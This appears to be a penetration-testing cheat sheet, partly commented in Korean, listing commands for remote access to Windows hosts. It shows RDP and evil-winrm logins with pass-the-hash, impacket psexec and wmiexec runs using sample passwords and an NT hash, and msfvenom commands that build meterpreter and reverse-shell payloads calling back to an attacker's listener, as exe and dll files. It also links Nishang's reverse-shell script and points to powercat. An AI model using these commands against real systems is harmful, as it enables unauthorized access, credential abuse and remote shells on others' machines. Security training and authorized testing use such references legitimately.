Tip

xfreerdp

xfreerdp /v:$IP /u:$USER /p:$PWD /dynamic-resolution
xfreerdp3 /v:$IP /u:$USER /p:$PWD /dynamic-resolution
xfreerdp3 /v:$IP /u:$DOMAIN\\\\$USER /p:$PWD /dynamic-resolution
xfreerdp3 /v:$IP /u:$DOMAIN\\\\$USER /pth:$HASH +clipboard

evil-winrm

evil-winrm -i $IP -u [user] -p [password]
evil-winrm -i $IP -u [user] -H [hash] # Pass the Hash

# file transfer
upload <local_path> <remote_path>
download <remote_path> <local_path>

impacket-psexec

# 관리자 권한으로 원격 명령 실행
psexec.py 'wook:w00k413!'@<IP>

# 도메인 계정 사용
psexec.py <domain>/<username>:<password>@<target-ip>
psexec.py acme.local/john.doe:Winter2024!@<IP>
psexec.py ACME/administrator:Password123@10.10.10.5
psexec.py -hashes <hash> <username>@$IP

# NLTM 해시를 이용한 인증 (Pass-the-Hash)
psexec.py administrator@<IP> -hashes <LMHASH>:<NTHASH>
psexec.py administrator@10.10.10.5 -hashes aad3b435b51404eeaad3b435b51404ee:cc36cf7a8514893efccd332446158b1a

# 특정 명령어만 실행
psexec.py administrator:Password123@<IP> "ipconfig /all"

impacket-wmiexec

wmiexec.py [domain]/[user]:[password]@$IP

msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o shell.dll

Nishang

<https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1>

Powercat

cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .